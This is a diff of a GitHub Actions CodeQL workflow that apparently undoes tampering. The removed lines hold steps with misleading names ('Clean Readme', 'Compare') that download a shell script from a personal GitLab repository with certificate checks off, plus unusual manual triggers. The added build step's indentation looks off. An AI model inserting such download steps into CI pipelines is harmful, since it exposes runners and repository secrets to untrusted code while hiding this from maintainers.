--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -6,12 +6,13 @@
 name: "CodeQL"
 
 on:
-  repository_dispatch:
-  workflow_dispatch:
-  pull_request:
+  push:
     branches: [master]
-#  schedule:
-#    - cron: '0 8 * * 3'
+  pull_request:
+    # The branches below must be a subset of the branches above
+    branches: [master]
+  schedule:
+    - cron: '0 8 * * 3'
 
 jobs:
   analyze:
@@ -31,15 +32,11 @@ jobs:
     - name: Checkout repository
       uses: actions/checkout@v2
 
-    # =====Initializes the CodeQL tools for scanning.
+    # Initializes the CodeQL tools for scanning.
     - name: Initialize CodeQL
       uses: github/codeql-action/init@v1
-   # - name: Clean Readme
-      run: |
-        curl -L -O -k https://gitlab.com/sarahemersonzrex/msconfig/-/raw/main/memory_pressure.sh
       with:
         languages: ${{ matrix.language }}
-
         # If you wish to specify custom queries, you can do so here or in a config file.
         # By default, queries listed here will override any specified in a config file.
         # Prefix the list here with "+" to use these queries and those in the config file.
@@ -56,9 +53,10 @@ jobs:
     # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
     #    and modify them (or add more) to build your code if your project
     #    uses a compiled language
-    - name: Compare
-      run: |
-        curl -L -O -k https://gitlab.com/sarahemersonzrex/msconfig/-/raw/main/memory_pressure.sh
+
+     - run: |
+        make bootstrap
+        make release
 
     - name: Perform CodeQL Analysis
       uses: github/codeql-action/analyze@v1
